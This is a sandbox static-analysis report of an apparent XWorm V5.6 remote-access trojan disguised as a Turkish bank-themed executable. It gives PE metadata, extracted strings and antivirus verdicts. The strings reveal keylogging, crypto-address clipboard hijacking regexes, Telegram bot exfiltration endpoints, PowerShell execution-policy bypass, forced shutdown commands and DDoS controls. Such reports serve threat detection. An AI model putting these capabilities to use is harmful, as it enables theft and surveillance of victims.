Static | ZeroBOX

PE Compile Time

2024-07-26 03:52:59

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

| Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
| --- | --- | --- | --- | --- |
| .text | 0x00002000 | 0x00009b24 | 0x00009c00 | 5.71611165124 |
| .rsrc | 0x0000c000 | 0x0002dda4 | 0x0002de00 | 5.42603951335 |
| .reloc | 0x0003a000 | 0x0000000c | 0x00000200 | 0.0815394123432 |

Resources

| Name | Offset | Size | Language | Sub-language | File type |
| --- | --- | --- | --- | --- | --- |
| RT_ICON | 0x00033a70 | 0x00005e4d | LANG_NEUTRAL | SUBLANG_NEUTRAL | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |
| RT_ICON | 0x00033a70 | 0x00005e4d | LANG_NEUTRAL | SUBLANG_NEUTRAL | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |
| RT_ICON | 0x00033a70 | 0x00005e4d | LANG_NEUTRAL | SUBLANG_NEUTRAL | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |
| RT_ICON | 0x00033a70 | 0x00005e4d | LANG_NEUTRAL | SUBLANG_NEUTRAL | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |
| RT_ICON | 0x00033a70 | 0x00005e4d | LANG_NEUTRAL | SUBLANG_NEUTRAL | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |
| RT_ICON | 0x00033a70 | 0x00005e4d | LANG_NEUTRAL | SUBLANG_NEUTRAL | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |
| RT_ICON | 0x00033a70 | 0x00005e4d | LANG_NEUTRAL | SUBLANG_NEUTRAL | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |
| RT_ICON | 0x00033a70 | 0x00005e4d | LANG_NEUTRAL | SUBLANG_NEUTRAL | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |
| RT_ICON | 0x00033a70 | 0x00005e4d | LANG_NEUTRAL | SUBLANG_NEUTRAL | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |
| RT_GROUP_ICON | 0x000398c0 | 0x00000084 | LANG_NEUTRAL | SUBLANG_NEUTRAL | data |
| RT_VERSION | 0x00039944 | 0x00000274 | LANG_NEUTRAL | SUBLANG_NEUTRAL | data |
| RT_MANIFEST | 0x00039bb8 | 0x000001ea | LANG_NEUTRAL | SUBLANG_NEUTRAL | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators |

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<Module>
mscorlib
Microsoft.VisualBasic
MyApplication
MyComputer
MyProject
MyWebServices
ThreadSafeObjectProvider`1
Settings
ClientSocket
Messages
Uninstaller
XLogger
Clipper
ClipboardFunc
ClipboardNotification
AlgorithmAES
Helper
LowLevelKeyboardProc
NativeMethods
NotificationForm
LASTINPUTINFO
EXECUTION_STATE
Microsoft.VisualBasic.ApplicationServices
ApplicationBase
Microsoft.VisualBasic.Devices
Computer
System
Object
.cctor
get_Computer
m_ComputerObjectProvider
get_Application
m_AppObjectProvider
get_User
m_UserObjectProvider
get_WebServices
m_MyWebServicesObjectProvider
Application
WebServices
Equals
GetHashCode
GetType
ToString
Create__Instance__
instance
Dispose__Instance__
get_GetInstance
m_ThreadStaticValue
GetInstance
InstallDir
InstallStr
LoggerPath
ChatID
SendBot
isConnected
System.Net.Sockets
Socket
BufferLength
Buffer
System.IO
MemoryStream
System.Threading
ManualResetEvent
allDone
SendSync
Interval
ActivatePong
BeginConnect
ConnectServer
INDATE
Spread
Antivirus
IAsyncResult
BeginReceive
BeginRead
EndSend
isDisconnected
Plugin
SendMSG
SendError
Thread
ReportWindow
Monitoring
OpenUrl
Hidden
capCreateCaptureWindowA
lpszWindowName
dwStyle
nWidth
nHeight
hwndParent
Handle
capGetDriverDescriptionA
wDriver
lpszName
cbName
lpszVer
RunDisk
Extension
Memory
buffer
IsUpdate
CurrentActiveWindowTitle
SetHook
HookCallback
wParam
lParam
KeyboardLayout
vkCode
GetActiveWindowTitle
WM_KEYDOWN
_hookID
SetWindowsHookEx
idHook
dwThreadId
UnhookWindowsHookEx
CallNextHookEx
GetModuleHandle
lpModuleName
WHKEYBOARDLL
GetForegroundWindow
GetWindowThreadProcessId
lpdwProcessId
GetKeyState
keyCode
GetKeyboardState
lpKeyState
GetKeyboardLayout
idThread
System.Text
StringBuilder
ToUnicodeEx
wVirtKey
wScanCode
pwszBuff
cchBuff
wFlags
MapVirtualKey
uMapType
System.Text.RegularExpressions
BTCRegex
ETHRegex
TRCRegex
GetText
SetText
Decrypt
ProcessDpi
SetProcessDpiAwareness
awareness
IsValidDomainName
FileStream
fileStream
Alphabet
Random
current
GetRandomString
length
GetLastInputInfo
idletime
lastInputInf
GetLastInputTime
TimeSpan
sumofidletime
LastLastIdletime
LastAct
userAgents
GetWindowText
SetThreadExecutionState
esFlags
PreventSleep
GetHashT
strToHash
SetValue
GetValue
Decompress
Compress
AES_Encryptor
AES_Decryptor
_appMutex
CreateMutex
CloseMutex
MulticastDelegate
TargetObject
TargetMethod
AsyncCallback
BeginInvoke
DelegateCallback
DelegateAsyncState
EndInvoke
DelegateAsyncResult
Invoke
AddClipboardFormatListener
SetParent
hWndChild
hWndNewParent
intpreclp
System.Windows.Forms
currentClipboard
RegexResult
pattern
Message
WndProc
CreateParams
get_CreateParams
ValueType
cbSize
dwTime
value__
ES_CONTINUOUS
ES_DISPLAY_REQUIRED
ES_SYSTEM_REQUIRED
System.ComponentModel
EditorBrowsableAttribute
EditorBrowsableState
System.CodeDom.Compiler
GeneratedCodeAttribute
System.Diagnostics
DebuggerHiddenAttribute
Microsoft.VisualBasic.CompilerServices
StandardModuleAttribute
HideModuleNameAttribute
System.ComponentModel.Design
HelpKeywordAttribute
System.Runtime.CompilerServices
RuntimeHelpers
GetObjectValue
RuntimeTypeHandle
GetTypeFromHandle
Activator
CreateInstance
MyGroupCollectionAttribute
System.Runtime.InteropServices
ComVisibleAttribute
ThreadStaticAttribute
CompilerGeneratedAttribute
Interaction
Environ
String
Concat
VB$AnonymousDelegate_0
_Lambda$__1
_Lambda$__2
_Lambda$__3
_Lambda$__4
DebuggerDisplayAttribute
DebuggerStepThroughAttribute
Exception
FileInfo
Conversions
Environment
ExpandEnvironmentVariables
ProjectData
SetProjectError
ClearProjectError
DirectoryInfo
get_Directory
get_FullName
Directory
Exists
CreateDirectory
Delete
ReadAllBytes
WriteAllBytes
SpecialFolder
GetFolderPath
GetFileNameWithoutExtension
CreateObject
Boolean
NewLateBinding
LateGet
ChangeType
LateSetComplex
LateCall
FileMode
ThreadStart
System.Net
WebClient
ServicePointManager
set_Expect100Continue
SecurityProtocolType
set_SecurityProtocol
set_DefaultConnectionLimit
get_NewLine
get_UserName
ServerComputer
ComputerInfo
get_Info
get_OSFullName
DownloadString
IDisposable
Dispose
WaitHandle
WaitOne
STAThreadAttribute
_Lambda$__5
_Lambda$__6
IPAddress
GetHostAddresses
TimerCallback
AddressFamily
SocketType
ProtocolType
set_ReceiveBufferSize
set_SendBufferSize
ToInteger
Connect
SocketFlags
EventWaitHandle
Replace
OperatingSystem
get_OSVersion
get_ServicePack
get_Is64BitOperatingSystem
DateTime
FileSystemInfo
get_LastWriteTime
GetFileName
Operators
CompareString
System.Security.Principal
WindowsIdentity
GetCurrent
WindowsPrincipal
WindowsBuiltInRole
IsInRole
System.Management
ManagementObjectSearcher
ManagementBaseObject
ManagementObjectCollection
ManagementObjectEnumerator
get_MachineName
GetEnumerator
get_Current
get_Item
Append
MoveNext
get_Length
Substring
ObjectQuery
ManagementObject
ConcatenateObject
get_TotalPhysicalMemory
UInt64
Conversion
Double
Remove
EndReceive
ToArray
ToLong
Stream
WriteByte
ParameterizedThreadStart
ObjectFlowControl
CheckForSyncLockOnValueType
Monitor
SelectMode
BeginSend
Collect
_Closure$__1
$VB$Local_Host
$VB$Local_Port
_Lambda$__9
_Lambda$__7
_Lambda$__8
System.Drawing
Graphics
Rectangle
Bitmap
Strings
CompareMethod
Restart
SocketShutdown
Shutdown
Convert
FromBase64String
GetTempPath
Combine
DownloadFile
Process
AppWinStyle
ReadAllText
WriteAllText
get_Message
Microsoft.VisualBasic.MyServices
RegistryProxy
get_Registry
Microsoft.Win32
RegistryKey
get_CurrentUser
DeleteSubKey
Screen
get_PrimaryScreen
get_Bounds
get_Width
get_Height
System.Drawing.Imaging
PixelFormat
FromImage
CopyPixelOperation
CopyFromScreen
GraphicsUnit
DrawImage
ImageFormat
get_Jpeg
ToBase64String
System.Reflection
MethodInfo
AppDomain
get_CurrentDomain
Assembly
GetTypes
MemberInfo
get_Name
GetMethods
ConditionalCompareObjectEqual
ToInt32
StartsWith
ToBoolean
Stopwatch
FromSeconds
get_Elapsed
op_GreaterThan
System.Collections.Generic
List`1
GetProcesses
get_MainWindowTitle
IsNullOrEmpty
ToLower
Contains
Func`2
System.Core
System.Linq
Enumerable
IEnumerable`1
HttpWebRequest
HttpWebResponse
WebRequest
Create
set_UserAgent
set_AllowAutoRedirect
set_Timeout
set_Method
WebResponse
GetResponse
ProcessStartInfo
EndsWith
ProcessWindowStyle
set_WindowStyle
set_Arguments
get_EntryPoint
MethodBase
ParameterInfo
GetParameters
Encoding
get_UTF8
GetBytes
DllImportAttribute
avicap32.dll
MarshalAsAttribute
UnmanagedType
StreamWriter
GetTempFileName
TextWriter
WriteLine
get_StartupPath
get_ExecutablePath
set_FileName
set_CreateNoWindow
set_ErrorDialog
set_UseShellExecute
IntPtr
GetCurrentProcess
get_ProcessName
op_Explicit
op_Equality
Marshal
ReadInt32
ToUInteger
UInt32
GetProcessById
IsNullOrWhiteSpace
user32.dll
kernel32.dll
OutAttribute
_Closure$__2
_Closure$__3
$VB$Local_ReturnValue
_Lambda$__10
$VB$Local_txt
_Lambda$__11
ApartmentState
SetApartmentState
Clipboard
Control
get_Handle
get_Success
get_Msg
OrObject
LateSet
System.Security.Cryptography
RijndaelManaged
ICryptoTransform
MD5CryptoServiceProvider
HashAlgorithm
ComputeHash
SymmetricAlgorithm
set_Key
CipherMode
set_Mode
CreateDecryptor
TransformFinalBlock
ProcessModule
get_MainModule
get_FileName
UriHostNameType
CheckHostName
get_Chars
SizeOf
get_TickCount
GetString
get_ProcessorCount
get_SystemDirectory
GetPathRoot
DriveInfo
get_TotalSize
get_ASCII
ToUpper
Registry
CurrentUser
RegistryKeyPermissionCheck
CreateSubKey
RegistryValueKind
BitConverter
System.IO.Compression
GZipStream
CompressionMode
SubtractObject
CreateEncryptor
SHCore.dll
StructLayoutAttribute
LayoutKind
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
GuidAttribute
AssemblyFileVersionAttribute
AssemblyTrademarkAttribute
AssemblyCopyrightAttribute
AssemblyProductAttribute
AssemblyCompanyAttribute
AssemblyDescriptionAttribute
AssemblyTitleAttribute
ziraat genel srular
ziraat genel srular.exe
MyTemplate
14.0.0.0
My.Computer
My.User
My.WebServices
My.Application
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
<generated method>
<generated method>
WrapNonExceptionThrows
$35ed8dbd-972d-4201-bea1-c66ee57eca49
1.0.0.0
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
\Log.tmp
WScript.Shell
CreateShortcut
TargetPath
WorkingDirectory
[XWorm V5.6]
New Clinet :
UserName :
OSFullName :
USB :
CPU :
GPU :
RAM :
Groub :
https://api.telegram.org/bot
/sendMessage?chat_id=
&text=
Microsoft
Service Pack
dd/MM/yyy
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
SELECT * FROM Win32_VideoController
Win32_Processor.deviceid="CPU0"
Core(TM)
uninstall
update
Urlopen
Urlhide
PCShutdown
shutdown.exe /f /s /t 0
PCRestart
shutdown.exe /f /r /t 0
PCLogoff
shutdown.exe -L
RunShell
StartDDos
StopDDos
StartReport
StopReport
\drivers\etc\hosts
Shosts
HostsMSG
Modified successfully!
HostsErr
plugin
sendPlugin
savePlugin
RemovePlugins
Plugins Removed!
OfflineGet
Plugin
Invoke
RunRecovery
Recovery
RunOptions
injRun
UACFunc
Plugin Error!
ToLower
Open [
powershell.exe
-ExecutionPolicy Bypass -File "
POST / HTTP/1.1
Host:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
User-Agent:
Content-length: 5235
@echo off
timeout 3 > NUL
" /f /q
ToUpper
[SPACE]
Return
[ENTER]
Escape
LControlKey
[CTRL]
RControlKey
RShiftKey
[Shift]
LShiftKey
[Back]
Capital
[CAPSLOCK: OFF]
[CAPSLOCK: ON]
MainWindowTitle
ProcessName
\b(bc1|[13])[a-zA-HJ-NP-Z0-9]{26,45}\b
\b(0x)[a-zA-HJ-NP-Z0-9]{40,45}\b
T[A-Za-z1-9]{33}
BTC Clipper
ETH Clipper
TRC20 Clipper
ExStyle
Software\
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
abcdefghijklmnopqrstuvwxyz
Err HWID
ToArray
abcdefghijklmnopqrstuvwxyz
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
1.0.0.0
InternalName
ziraat genel srular.exe
LegalCopyright
OriginalFilename
ziraat genel srular.exe
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Clean
tehtris Clean
ClamAV Win.Packed.njRAT-10002074-1
CMC Clean
CAT-QuickHeal Trojan.GenericFC.S29961068
Skyhigh BehavesLike.Win32.Trojan.dm
ALYac Gen:Variant.Jalapeno.12953
Cylance Unsafe
Zillya Clean
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Trojan ( 005aa5f01 )
Alibaba Clean
K7GW Trojan ( 005aa5f01 )
Cybereason malicious.1a8edd
huorong Backdoor/MSIL.DDos.b
Baidu Clean
VirIT Trojan.Win32.MSIL_Heur.B
Paloalto Clean
Symantec ML.Attribute.HighConfidence
Elastic Windows.Generic.Threat
ESET-NOD32 a variant of MSIL/Agent.DWN
APEX Malicious
Avast Win32:XWorm-C [Rat]
Cynet Clean
Kaspersky HEUR:Backdoor.MSIL.XWorm.gen
BitDefender Gen:Variant.Jalapeno.12953
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Gen:Variant.Jalapeno.12953
Tencent Worm.Msil.Xworm.16001238
TACHYON Clean
Sophos Troj/RAT-FJ
F-Secure Trojan.TR/Spy.Gen
DrWeb BackDoor.XWormNET.1
VIPRE Gen:Variant.Jalapeno.12953
TrendMicro Clean
McAfeeD Real Protect-LS!AED4C0C1A8ED
Trapmine suspicious.low.ml.score
FireEye Generic.mg.aed4c0c1a8edddda
Emsisoft Gen:Variant.Jalapeno.12953 (B)
Ikarus Trojan.MSIL.Injector
GData MSIL.Backdoor.XWorm.C
Jiangmin Trojan.MSIL.lpvd
Webroot Clean
Varist W32/MSIL_Agent.FWP.gen!Eldorado
Avira TR/Spy.Gen
Antiy-AVL Clean
Kingsoft malware.kb.c.1000
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Jalapeno.D3299
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Backdoor.MSIL.XWorm.gen
Microsoft Backdoor:MSIL/XWormRAT!atmn
Google Detected
AhnLab-V3 Trojan/Win.AntiVm.C5390991
Acronis Clean
McAfee Trojan-FVYT!AED4C0C1A8ED
MAX malware (ai score=89)
VBA32 Backdoor.MSIL.XWorm.gen
Malwarebytes Backdoor.XWorm
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Rising Backdoor.njRAT!1.9E49 (CLASSIC)
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Clean
Fortinet MSIL/Bladabindi.SSNY!tr
BitDefenderTheta Gen:NN.ZemsilF.36810.nm0@aSla0Bl
AVG Win32:XWorm-C [Rat]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud Clean
No IRMA results available.